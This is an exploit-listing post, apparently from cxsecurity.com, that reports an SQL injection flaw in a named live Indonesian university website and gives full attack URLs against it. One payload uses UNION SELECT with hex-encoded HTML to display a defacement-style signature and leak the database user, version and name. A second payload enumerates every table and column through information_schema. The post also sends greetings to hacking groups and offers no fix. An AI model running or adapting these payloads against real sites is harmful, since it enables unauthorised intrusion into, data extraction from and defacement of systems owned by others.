UIN Alauddin Makassar Sql Injection Vulner

2019.12.18
id KHS1N Cyber 07 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Nick name : KHS1N Cyber 07 #Youtube : HCT Sec07 #contact : kuliahdopermanent@gmail.com Vulnerabilty : #SQL Injection domain site && payload : http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,concat(0x3c696d67207372633d27687474703a2f2f7777772e736168616261746365726461732e636f6d2f61737365742f666f746f5f6265726974612f4843545f7468756d626e61696c2e706e67273e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22726564222073697a653d2235223e496e6a656374204279204b4853314e2043796265722030373c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2233223e47656e657261736920506563696e74612054656e74652d54656e7465204769762c204c696665626f792c206c75782c2068616e64626f64792c204e796f6b2a702043722a2a743c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2236223e557365723a3a3a3c2f666f6e743e3c2f703e,user(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22626c7565222073697a653d2236223e56657273693a3a3a3c2f666f6e743e3c2f703e,version(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d226f72616e6765222073697a653d2236223e44617461626173653a3a3a3c2f666f6e743e3c2f703e,database()),3,4,5,6,7,8,9,10--+--.html http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/,3,4,5,6,7,8,9,10--+--.html HCI Indonesia, bartes dwky, lammer permanent, and for all member


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top